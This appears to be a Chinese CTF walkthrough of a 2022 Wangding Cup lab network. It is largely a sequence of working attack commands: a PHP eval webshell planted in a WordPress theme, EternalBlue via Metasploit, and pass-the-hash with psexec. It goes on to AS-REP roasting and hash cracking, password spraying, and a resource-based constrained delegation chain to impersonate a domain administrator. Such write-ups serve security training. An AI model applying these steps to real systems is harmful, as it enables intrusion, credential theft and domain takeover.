同一个靶场,不同的总结
信息收集
拿到靶机IP第一步fscan进行扫描
web渗透
访问80是个blog网站
识别网站技术栈和特征,得到WordPress[6.2.6]
利用wordpress的杀器wpscan,没拿到有用数据
wpscan --url "http://39.98.116.169/"
尝试弱密码登录后台,看来考点不在这,很简单就进入后台了
admin
123456
这个web漏洞就很低级了,非常非常常见的wordpress漏洞
<?php @eval($_POST['shell']);?>
蚁剑连接
http://39.98.116.169/wp-content/themes/twentytwentyone/footer.php
在根目录拿到第一个flag
flag{93a23b51-d3f1-47fa-8da7-a8a950ed26da}
内网信息收集
172.22.15.26
看到这就知道为什么frp和fscan等工具都上传到/tmp目录,因为在Linux中,tmp目录的权限通常设置为777(rwxrwxrwx),这意味着任何用户都可以访问和修改该目录中的文件。
fscan扫描网段
./fscan -h 172.22.15.0/24
172.22.15.13:88 open
172.22.15.24:3306 open
172.22.15.13:445 open
172.22.15.18:445 open
172.22.15.35:445 open
172.22.15.24:445 open
172.22.15.13:139 open
172.22.15.18:139 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.13:135 open
172.22.15.18:135 open
172.22.15.35:135 open
172.22.15.24:135 open
172.22.15.18:80 open
172.22.15.24:80 open
172.22.15.26:80 open
172.22.15.26:22 open
[*] WebTitle http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.15.24 code:302 len:0 title:None 跳转url: http://172.22.15.24/www
[*] NetInfo
[*]172.22.15.35
[->]XR-0687
[->]172.22.15.35
[*] NetInfo
[*]172.22.15.24
[->]XR-WIN08
[->]172.22.15.24
[*] NetInfo
[*]172.22.15.13
[->]XR-DC01
[->]172.22.15.13
[*] NetInfo
[*]172.22.15.18
[->]XR-CA
[->]172.22.15.18
[*] NetBios 172.22.15.35 XIAORANGXR-0687
[*] OsInfo 172.22.15.13 (Windows Server 2016 Standard 14393)
[+] MS17-010 172.22.15.24 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.15.13 [+] DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.24 WORKGROUPXR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.15.26 code:200 len:40268 title:XIAORANG.LAB
[*] WebTitle http://172.22.15.24/www/sys/index.php code:200 len:135 title:None
[+] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
整理信息
172.22.15.24存在ms17-010
|
|
|
|
|
|---|---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
kali搭配msfconsole和proxychains4工具配置
vim /etc/proxychains4.conf
然后搭建frp服务,详细可见关于内网代理、vm、frp、proxifier全局流量转发等问题
启动
proxychains4 msfconsole打ms17-010
一把梭
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.15.24
run
提取本地密码hash值
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
psexec.py
远程执行
可使用密码认证、hash认证、kerberos认证。
拿到shell
proxychains4 python3 psexec.py [email protected] -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
#-codec gbk:强制编码设置为 gbk
C:Windowssystem32> cd ..
C:Windows> cd ..
C:> dir 驱动器 C 中的卷没有标签。
卷的序列号是 46D4-3B9F
C: 的目录
2009/07/14 11:20 <DIR> PerfLogs
2023/06/05 12:49 <DIR> phpstudy_pro
2023/06/03 14:54 <DIR> Program Files
2020/01/15 16:15 <DIR> Program Files (x86)
2023/02/01 12:30 <DIR> Users
2025/01/07 21:56 <DIR> Windows
0 个文件 0 字节
6 个目录 27,628,462,080 可用字节
C:> cd users
C:Users> dir 驱动器 C 中的卷没有标签。
卷的序列号是 46D4-3B9F
C:Users 的目录
2023/02/01 12:30 <DIR> .
2023/02/01 12:30 <DIR> ..
2023/06/05 14:55 <DIR> Administrator
2009/07/14 12:57 <DIR> Public
0 个文件 0 字节
4 个目录 27,628,396,544 可用字节
C:Users> cd Administrator
C:UsersAdministrator> dir 驱动器 C 中的卷没有标签。
卷的序列号是 46D4-3B9F
C:UsersAdministrator 的目录
2023/06/05 14:55 <DIR> .
2023/06/05 14:55 <DIR> ..
2023/02/01 12:30 <DIR> Contacts
2023/06/05 13:04 <DIR> Desktop
2023/02/01 12:30 <DIR> Documents
2023/06/05 12:28 <DIR> Downloads
2023/02/01 12:30 <DIR> Favorites
2023/06/05 14:55 <DIR> flag
2023/02/01 12:30 <DIR> Links
2023/02/01 12:30 <DIR> Music
2023/02/01 12:30 <DIR> Pictures
2023/02/01 12:30 <DIR> Saved Games
2023/02/01 12:30 <DIR> Searches
2023/02/01 12:30 <DIR> Videos
0 个文件 0 字节
14 个目录 27,628,396,544 可用字节
C:UsersAdministrator> cd flag
C:UsersAdministratorflag> dir 驱动器 C 中的卷没有标签。
卷的序列号是 46D4-3B9F
C:UsersAdministratorflag 的目录
2023/06/05 14:55 <DIR> .
2023/06/05 14:55 <DIR> ..
2025/01/07 20:59 296 flag02.txt
1 个文件 296 字节
2 个目录 27,628,396,544 可用字节
C:UsersAdministratorflag> type flag02.txt __ _ ___ __
/ _| | / _ /_ |
| |_| | __ _ __ _| | | || |
| _| |/ _` |/ _` | | | || |
| | | | (_| | (_| | |_| || |
|_| |_|__,_|__, |___/ |_|
__/ |
|___/
flag02: flag{9700783c-9ef8-4fa5-bd59-c517cbb721f7}
C:UsersAdministratorflag>
flag{9700783c-9ef8-4fa5-bd59-c517cbb721f7}
修改admin密码
net user administrator Admin123456.
RDP连接内网
Profixier开全局代理win+r开mstsc连接
但是出现这个报错,解决办法CredSSP加密数据库修正
过去翻 phpstudy mysql 密码
root root@#123
http://172.22.15.24/phpmyadmin/index.php
连接mysql,导出OA列表
不过我这边网站一直加载中,正常应该能连接成功的
没关系,我们使用navicat连接导出一样的效果,然后将email的数据进行保存
Kerberos 预身份验证&TGT票据&AS-REP Roasting
跑一下GetNPUsers.py看一下是否存在有不要求Kerberos 预身份验证的账户。
proxychains4 python3 GetNPUsers.py -dc-ip 172.22.15.13 xiaorang.lab/ -usersfile /root/flowers/email.txt
得到TGT票据
236e804ed693e02427a01533ff3d7b6c93b2f8c22e2fb5d7a002dd06e9bb68f38b29cfb3e887325ea00077cf7f11c0af25fc066150f59ada276fece630d7ea772dda6154e89458cd5217332fb8cd8b0bf9364ddc46cce0e38c3247631bff092e6a91cb4efa547336e9678bea7dd7e91111490b190e0f0d37e07c11920b52dd2ce61fe2ec2149027e76b156137c0ab70a6455b547eb3b3f0aae0b72c6ef02221621ad40a18c3d3ea54ca61108027156e6f2913ea0c4e2f8617a5d800ae17d5bc4a2493175c3b30d2d494b453d1e9544891831d451821c9757836110da283f4147cc68fdb978f718fcab73883e86
239657f827debbfc63e0f3c2483ce688a3704de049d3e5bc7f30f9633d34f4c75339abcf17ed3dbacaa1ca75fb8656cc732f007253dc13c4fa428ad1fea9a149bd4fc8c9199957dc569c2efba5c68fd86c1b2568c76cb3c766a72c787af463b209060758b990b14180f1ee38c9c59aac81a2c4c713f30ca158d21d79c0576a9b559a2b8809ba85ddb377e1bcd0c792221278dbcaae2b39e9d49a95d96edd10392b131dcd354ef71b901bc43fb2cdb150a5cb7f678253b33356616180c0d12dd08ff9d68d591e4e418348d39b94005637f9309ce4ada7d6dbea80efc961bb3b332f170e2d2c9b7378ff880f3529
john --wordlist=/usr/share/wordlists/rockyou.txt /root/flowers/hash.txt
得到
1qaz2wsx (23krb5asrep[email protected]@XIAORANG.LAB)
lixiuying@xiaorang/winniethepooh
huachunmei@xiaorang/1qaz2wsx
找一下是哪台机器的账号密码,用crackmapexec去扫描
CrackMapExec 是一个多功能网络侦察和渗透工具,广泛用于测试 SMB、LDAP、WINRM 等协议的身份验证
proxychains4 -q crackmapexec smb 172.22.15.0/24 -u 'lixiuying' -p 'winniethepooh'
#-q 静默模式
尝试过后只有172.22.15.35能够登录
bloodhound 收集域内信息
proxychains bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
#-d 指定目标的 AD 域名为 xiaorang.lab
#-c all 指定采集所有支持的类型数据
#-ns 指定域的 DNS 服务器为 172.22.15.13
#--zip 将采集到的数据保存为 ZIP 文件,方便导入 BloodHound 图形化界面进行分析
#--dns-tcp 使用 TCP 协议(而非默认的 UDP)进行 DNS 查询
apt-get install bloodhound#安装
neo4j console #启动
User默认 neo4j
Password默认 neo4j
连接成功后就会提示创建新密码
我修改成root
接下来在终端输入bloodhound,会启动bloodhound的图形化页面,然后输入neo4j的账号密码即可
上传数据
之后我导如的情况和别人不一样,也看不出来,知识还是欠缺
ACL Abuse+RBCD提权
addcomputer.py是Impacket工具中的一个脚本,用于在域中添加计算机账户。
proxychains4 python3 addcomputer.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
rbcd.py是Impacket工具中的脚本,用于滥用基于资源的约束委派(Resource-Based Constrained Delegation, RBCD)
-action write:将委派权限写入目标机器XR-0687。-delegate-to 'XR-0687:指定被委派的目标为XR-0687。-delegate-from 'TEST:指定来源计算机账户为TEST(在第一步中添加的账户)
proxychains4 python3 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'TEST$'
getST.py是Impacket中的脚本,用于获取服务票据(Service Ticket)
使用添加的计算机账户 TEST的凭据P@ssw0rd访问目标服务。-spn cifs/XR-0687.xiaorang.lab:请求服务主名称 (SPN) 为cifs的服务票据,目标为XR-0687.xiaorang.lab。-impersonate Administrator:请求以域管理员身份模拟(Impersonation)。成功后,可以生成一个有效的 TGS(服务票据),用于访问目标服务。
getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
导入票据
export KRB5CCNAME=Administrator@[email protected]
psexec.py是 Impacket 中的一个脚本,基于 SMB 协议远程执行命令。
使用伪装管理员身份(获取的服务票据)登录目标主机
XR-0687.xiaorang.lab。
-k:使用 Kerberos 认证。
-no-pass:无需提供密码,因为使用的是 Kerberos 票据。成功后,攻击者可以在目标主机上执行任意命令。
-codec gbk:强制编码设置为 gbk
proxychains4 -q python3 psexec.py -k -no-pass -dc-ip 172.22.15.13 [email protected] -codec gbk
显示连接超时,可是我明明开启了全局流转发,这个就很奇怪
使用物理机和虚拟机去ping不都通
看了别人的博客,发现是/etc/hosts的问题,立刻修改
可能bloodhound收集信息没显示全部也是这个问题
172.22.15.35 XR-0687.xiaorang.lab
再次运行
C:Windowssystem32> cd ..
C:Windows> cd ..
C:> dir 驱动器 C 中的卷没有标签。
卷的序列号是 B424-185B
C: 的目录
2021/05/08 16:20 <DIR> PerfLogs
2023/06/03 17:59 <DIR> Program Files
2023/04/14 17:17 <DIR> Program Files (x86)
2023/06/05 15:31 <DIR> Users
2025/01/07 23:46 <DIR> Windows
0 个文件 0 字节
5 个目录 28,588,474,368 可用字节
C:> cd users
C:Users> dir 驱动器 C 中的卷没有标签。
卷的序列号是 B424-185B
C:Users 的目录
2023/06/05 15:31 <DIR> .
2023/06/05 16:56 <DIR> Administrator
2025/01/07 22:55 <DIR> lixiuying
2023/04/14 16:53 <DIR> Public
0 个文件 0 字节
4 个目录 28,588,474,368 可用字节
C:Users> cd Administrator
C:UsersAdministrator> dir 驱动器 C 中的卷没有标签。
卷的序列号是 B424-185B
C:UsersAdministrator 的目录
2023/06/05 16:56 <DIR> .
2023/06/05 15:31 <DIR> ..
2023/06/03 15:15 <DIR> 3D Objects
2023/06/03 15:15 <DIR> Contacts
2023/06/03 15:15 <DIR> Desktop
2023/06/03 18:02 <DIR> Documents
2023/06/03 17:58 <DIR> Downloads
2023/06/03 15:15 <DIR> Favorites
2023/06/05 14:58 <DIR> flag
2023/06/03 15:15 <DIR> Links
2023/06/03 15:15 <DIR> Music
2023/06/03 15:15 <DIR> Pictures
2023/06/03 15:15 <DIR> Saved Games
2023/06/03 15:15 <DIR> Searches
2023/06/03 15:15 <DIR> Videos
0 个文件 0 字节
15 个目录 28,588,474,368 可用字节
C:UsersAdministrator> cd flag
C:UsersAdministratorflag> ls
'ls' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
C:UsersAdministratorflag> dir 驱动器 C 中的卷没有标签。
卷的序列号是 B424-185B
C:UsersAdministratorflag 的目录
2023/06/05 14:58 <DIR> .
2023/06/05 16:56 <DIR> ..
2025/01/07 20:58 189 flag03.txt
1 个文件 189 字节
2 个目录 28,588,474,368 可用字节
C:UsersAdministratorflag> type flag03.txt __ _ __ ____
/ _| |__ _ __ _ / __ /
| _| / _` / _` | () |_
|_| |___,___, |__/___/
|___/
flag03: flag{37f3c673-29f0-40e4-83db-9ca820191d4a}
C:UsersAdministratorflag>
flag{37f3c673-29f0-40e4-83db-9ca820191d4a}
这最后一个flag是真没想到做法,参考其他师傅blog,漏洞编号是CVE-2022-26923
沙砾又没了,真是,这一个靶场还没打完
原文始发于微信公众号(flowers-boy):2022网鼎杯半决赛复盘详细打靶笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论